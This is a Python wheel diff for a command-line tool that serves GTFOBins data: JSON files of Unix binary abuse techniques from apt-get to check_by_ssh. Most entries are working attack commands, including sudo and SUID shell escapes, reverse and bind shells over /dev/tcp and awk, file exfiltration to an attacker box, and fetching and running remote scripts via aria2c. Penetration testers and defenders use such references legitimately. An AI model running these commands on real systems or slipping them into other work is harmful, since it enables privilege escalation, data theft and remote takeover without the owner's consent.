gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/__init__.py

@@ -0,0 +1,2 @@
+__version__ = "1.0.0"
+__author__ = "t0thkr1s"

gtfo/cli.py

@@ -0,0 +1,90 @@
+#!/usr/bin/env python3
+# coding=utf-8
+import argparse
+import json
+import os
+from pathlib import Path
+from string import Template
+
+from colorama import Fore, Style, init
+from pygments import highlight, formatters, lexers
+
+# Initialize colorama for Windows compatibility
+init(autoreset=True)
+
+banner = '''
+         __    ___        __    _
+  ___ _ / /_  / _/ ___   / /   (_)  ___   ___
+ / _ `// __/ / _/ / _ \ / _ \ / /  / _ \ (_-<
+ \_, / \__/ /_/   \___//_.__//_/  /_//_//___/
+/___/
+'''
+
+# Get the absolute path to the data directory
+PACKAGE_DIR = Path(__file__).parent
+data_dir = PACKAGE_DIR / "data"
+json_ext = ".json"
+
+info = Template(Style.BRIGHT + '[ ' + Fore.GREEN + '*' + Fore.RESET + ' ] ' + Style.RESET_ALL + '$text')
+fail = Template(Style.BRIGHT + '[ ' + Fore.RED + '-' + Fore.RESET + ' ] ' + Style.RESET_ALL + '$text')
+title = Template(
+    '\n' + Style.BRIGHT + '---------- [ ' + Fore.CYAN + '$title' + Fore.RESET + ' ] ----------' + Style.RESET_ALL + '\n'
+)
+description = Template(Style.DIM + '# ' + '$description' + Style.RESET_ALL)
+divider = '\n' + Style.BRIGHT + ' - ' * 10 + Style.RESET_ALL + '\n'
+
+
+def parse_args():
+    from . import __version__
+    parser = argparse.ArgumentParser(
+        prog="gtfo",
+        description="Command-line tool for GTFOBins - helps you bypass system security restrictions."
+    )
+    parser.add_argument('-v', '--version', action='version', version=f'%(prog)s {__version__}')
+    parser.add_argument('binary', metavar='binary', help='Unix binary to search for exploitation techniques')
+    return parser.parse_args()
+
+
+def run(binary=None):
+    """Main function that can be called programmatically"""
+    if binary is None:
+        args = parse_args()
+        binary = args.binary
+    
+    file_path = data_dir / f"{binary}{json_ext}"
+    if file_path.exists():
+        print(info.safe_substitute(text="Supplied binary: " + binary))
+        print(info.safe_substitute(text="Please wait, loading data ... "))
+        with open(file_path) as source:
+            data = source.read()
+
+        json_data = json.loads(data)
+        if 'description' in json_data:
+            print('\n' + description.safe_substitute(description=json_data['description']))
+
+        for vector in json_data['functions']:
+            print(title.safe_substitute(title=str(vector).upper()))
+            index = 0
+            for code in json_data['functions'][vector]:
+                index = index + 1
+                if 'description' in code:
+                    print(description.safe_substitute(description=code['description']) + '\n')
+                print(highlight(code['code'], lexers.BashLexer(),
+                                formatters.TerminalTrueColorFormatter(style='igor')).strip())
+                if index != len(json_data['functions'][vector]):
+                    print(divider)
+
+        print('\n' + info.safe_substitute(text="Goodbye, friend."))
+    else:
+        print(fail.safe_substitute(text="Sorry, couldn't find anything for " + binary))
+
+
+def main():
+    """Console script entry point"""
+    os.system('cls' if os.name == 'nt' else 'clear')
+    print(banner)
+    run()
+
+
+if __name__ == '__main__':
+    main()

gtfo/data/apt-get.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "apt-get changelog apt\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo apt-get changelog apt\n!/bin/sh\n"
+      },
+      {
+        "description": "For this to work the target package (e.g., 'sl') must not be installed.",
+        "code": "TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt-get install -c $TF sl\n"
+      },
+      {
+        "description": "When the shell exits the 'update' command is actually executed.",
+        "code": "sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/apt.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "apt-get changelog apt\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo apt-get changelog apt\n!/bin/sh\n"
+      },
+      {
+        "description": "For this to work the target package (e.g., 'sl') must not be installed.",
+        "code": "TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt install -c $TF sl\n"
+      },
+      {
+        "description": "When the shell exits the 'update' command is actually executed.",
+        "code": "sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/ar.json

@@ -0,0 +1,20 @@
+{
+  "description": "The file appears amid the binary content of the archive.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/aria2c.json

@@ -0,0 +1,24 @@
+{
+  "description": "Note that the subprocess is immediately sent to the background.",
+  "functions": {
+    "command": [
+      {
+        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\naria2c --on-download-error=$TF http://x\n"
+      },
+      {
+        "description": "The remote file 'aaaaaaaaaaaaaaaa' (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. '--allow-overwrite' is needed if this is executed multiple times with the same GID.",
+        "code": "aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash [host]/aaaaaaaaaaaaaaaa"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\nsudo aria2c --on-download-error=$TF http://x\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\n./aria2c --on-download-error=$TF http://x\n"
+      }
+    ]
+  }
+}

gtfo/data/arp.json

@@ -0,0 +1,20 @@
+{
+  "description": "The read file content is corrupted by error prints.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "arp -v -f [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./arp -v -f [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo arp -v -f [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/ash.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ash"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ash -c 'echo DATA > [file]'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ash"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ash"
+      }
+    ]
+  }
+}

gtfo/data/at.json

@@ -0,0 +1,20 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null\n"
+      }
+    ],
+    "command": [
+      {
+        "description": "The invocation will be blind, but it is possible to redirect the output to a file in a readable location.",
+        "code": "necho \"[command]\" | at now\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | sudo at now; tail -f /dev/null\n"
+      }
+    ]
+  }
+}

gtfo/data/atobm.json

@@ -0,0 +1,20 @@
+{
+  "description": "Outputs the first line of the file to standard error without the '-' and '#' characters, this can be customized with the '-c' option, by default is '-c -#'.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "atobm [file] 2>&1 | awk -F \"'\" '{printf \"%s\", $2}'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo atobm [file] 2>&1 | awk -F \"'\" '{printf \"%s\", $2}'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./atobm [file] 2>&1 | awk -F \"'\" '{printf \"%s\", $2}'\n"
+      }
+    ]
+  }
+}

gtfo/data/awk.json

@@ -0,0 +1,46 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "awk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "awk -v RHOST=[host] -v RPORT=[port] 'BEGIN {\n    s = \"/inet/tcp/0/\" RHOST \"/\" RPORT;\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
+        "code": "awk -v LPORT=[port] 'BEGIN {\n    s = \"/inet/tcp/\" LPORT \"/0/0\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "awk -v LFILE=[file] 'BEGIN { print \"DATA\" > LFILE }'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "awk '//' [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo awk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "suid": [
+    {
+      "code": "./awk '//' \"[file]\""
+    }
+    ],
+    "limited-suid": [
+      {
+        "code": "./awk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ]
+  }
+}

gtfo/data/base32.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "base32 \"[file]\" | base32 --decode\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "base32 \"[file]\" | base32 --decode\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo base32 \"[file]\" | base32 --decode\n"
+      }
+    ]
+  }
+}

gtfo/data/base64.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "base64 [file] | base64 --decode\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./base64 [file] | base64 --decode\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo base64 [file] | base64 --decode\n"
+      }
+    ]
+  }
+}

gtfo/data/basenc.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "basenc --base64 [file] | basenc -d --base64\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "basenc --base64 [file] | basenc -d --base64\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo basenc --base64 [file] | basenc -d --base64\n"
+      }
+    ]
+  }
+}

gtfo/data/bash.json

@@ -0,0 +1,69 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "bash"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "bash -c 'exec bash -i &>/dev/tcp/[host]/[port] <&1'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(<[file])\" > /dev/tcp/[host]/[port]'\n"
+      },
+      {
+        "description": "Send local file using a TCP connection. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
+        "code": "bash -c 'cat [file] > /dev/tcp/[host]/[port]'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "bash -c '{ echo -ne \"GET /[file] HTTP/1.0\\r\\nhost: [host]\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n    3<>/dev/tcp/[host]/[port] \\\n    | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } > [file]'\n"
+      },
+      {
+        "description": "Fetch remote file using a TCP connection. Run 'nc -l -p [port] < [file]' on the attacker box to send the file.",
+        "code": "bash -c 'cat < /dev/tcp/[host]/[port] > [file]'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "bash -c 'echo DATA > [file]'\n"
+      },
+      {
+        "description": "This adds timestamps to the output file.",
+        "code": "HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w [file]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "It trims trailing newlines and it's not binary-safe.",
+        "code": "bash -c 'echo \"$(<[file])\"'\n"
+      },
+      {
+        "description": "The read file content is surrounded by the current history content.",
+        "code": "HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -r [file]\nhistory\n"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "bash -c 'enable -f ./lib.so x'"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./bash -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo bash"
+      }
+    ]
+  }
+}

gtfo/data/bpftrace.json

@@ -0,0 +1,15 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "code": "sudo bpftrace -e 'BEGIN {system(\"/bin/sh\");exit()}'"
+      },
+      {
+        "code": "TF=$(mktemp)\necho 'BEGIN {system(\"/bin/sh\");exit()}' >$TF\nsudo bpftrace $TF\n"
+      },
+      {
+        "code": "sudo bpftrace -c /bin/sh -e 'END {exit()}'"
+      }
+    ]
+  }
+}

gtfo/data/bundler.json

@@ -0,0 +1,29 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "bundler help\n!/bin/sh\n"
+      },
+      {
+        "code": "export BUNDLE_GEMFILE=x\nbundler exec /bin/sh\n"
+      },
+      {
+        "code": "TF=$(mktemp -d)\ntouch $TF/Gemfile\ncd $TF\nbundler exec /bin/sh\n"
+      },
+      {
+        "description": "This spawns an interactive shell via 'irb'.",
+        "code": "TF=$(mktemp -d)\ntouch $TF/Gemfile\ncd $TF\nbundler console\nsystem('/bin/sh -c /bin/sh')\n"
+      },
+      {
+        "code": "TF=$(mktemp -d)\necho 'system(\"/bin/sh\")' > $TF/Gemfile\ncd $TF\nbundler install\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be  'less', other functions may apply.",
+        "code": "sudo bundler help\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/busctl.json

@@ -0,0 +1,15 @@
+{
+  "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+  "functions": {
+    "shell": [
+      {
+        "code": "busctl --show-machine\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo busctl --show-machine\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/busybox.json

@@ -0,0 +1,37 @@
+{
+  "description": "BusyBox may contain many UNIX utilities, run 'busybox --list-full' to check what GTFBins binaries are supported. Here some example.",
+  "functions": {
+    "shell": [
+      {
+        "code": "busybox sh"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Serve files in the local folder running an HTTP server.",
+        "code": "busybox httpd -f -p [port] -h .\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "busybox sh -c 'echo \"DATA\" > [file]'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "./busybox cat [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "It may drop the SUID privileges depending on the compilation flags and the runtime configuration.",
+        "code": "./busybox sh"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo busybox sh"
+      }
+    ]
+  }
+}

gtfo/data/byebug.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\nbyebug $TF\ncontinue\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\n./byebug $TF\ncontinue\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\nsudo byebug $TF\ncontinue\n"
+      }
+    ]
+  }
+}

gtfo/data/cancel.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send local file using a TCP connection. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
+        "code": "cancel -u \"$(cat [file])\" -h [host]:[port]\n"
+      }
+    ]
+  }
+}

gtfo/data/capsh.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "capsh --"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./capsh --gid=0 --uid=0 --"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo capsh --"
+      }
+    ]
+  }
+}

gtfo/data/cat.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "cat [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./cat [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo cat [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/certbot.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\ncertbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 2>&0'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\nsudo certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 2>&0'\n"
+      }
+    ]
+  }
+}

gtfo/data/check_by_ssh.json

@@ -0,0 +1,17 @@
+{
+  "description": "This is the 'check_by_ssh' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'.\n",
+  "functions": {
+    "shell": [
+      {
+        "description": "The shell will only last 10 seconds.",
+        "code": "check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The shell will only last 10 seconds.",
+        "code": "sudo check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx"
+      }
+    ]
+  }
+}